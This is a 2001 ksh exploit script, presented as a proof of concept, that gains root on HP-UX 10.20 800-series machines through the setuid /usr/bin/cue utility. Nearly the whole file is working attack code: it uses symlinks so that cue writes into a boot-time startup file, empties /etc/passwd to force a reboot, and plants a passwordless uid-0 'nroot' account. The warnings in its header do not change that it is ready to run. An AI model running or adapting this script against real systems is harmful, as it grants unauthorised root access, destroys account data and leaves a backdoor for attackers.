#!/usr/bin/ksh

##
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
##
## This is just a proof of concept. Don't use for malicious
## purpose. If ever you decide to run that script, please
## read the code carefully before!
##
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
## people. Good job sweethearts.
##
## Old-styled exploit, tested on HPUX 10.20, model 899
## Warning : /usr/bin/cue exists on HPUX 800 models only
##
## Let's test the model by the way...
##

MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
export MODEL

if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
then
     echo "Your host doesn't look like a HPuX 8** model, stopping now."
     exit
fi

##
## Test whether /usr/bin/cue exists or not...
##

if [ ! -u /usr/bin/cue ]
then
     echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
     exit
fi

##
## Well you passed the above tests. Going on playing.
## Creating a file within /etc/rc.config.d : It will
## be executed at next reboot (which might happen
## soon)
##

TTY=`tty | awk -F '/' '{print $3}'`
export TTY

TERM=whatevah
export TERM

umask 000
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## Inserting evil root account within /etc/passwd
##

echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit

##
## Now saving the passwd file, which we are about to empty
## 

cp /etc/passwd /tmp/passwd

##
## passwd file destruction
## (SOMEONE SET US UP THE BOMB !!)
##

rm IDMERROR.$TTY
ln -s /etc/passwd IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## *POOF*, now that the /etc/passwd file is emptied, admin
## MUST reboot to get things done.
##

echo "Your nroot account will be created within /etc/passwd"
echo "with no password. Remove it asap, it's just a proof"
echo "of concept!"

# The end.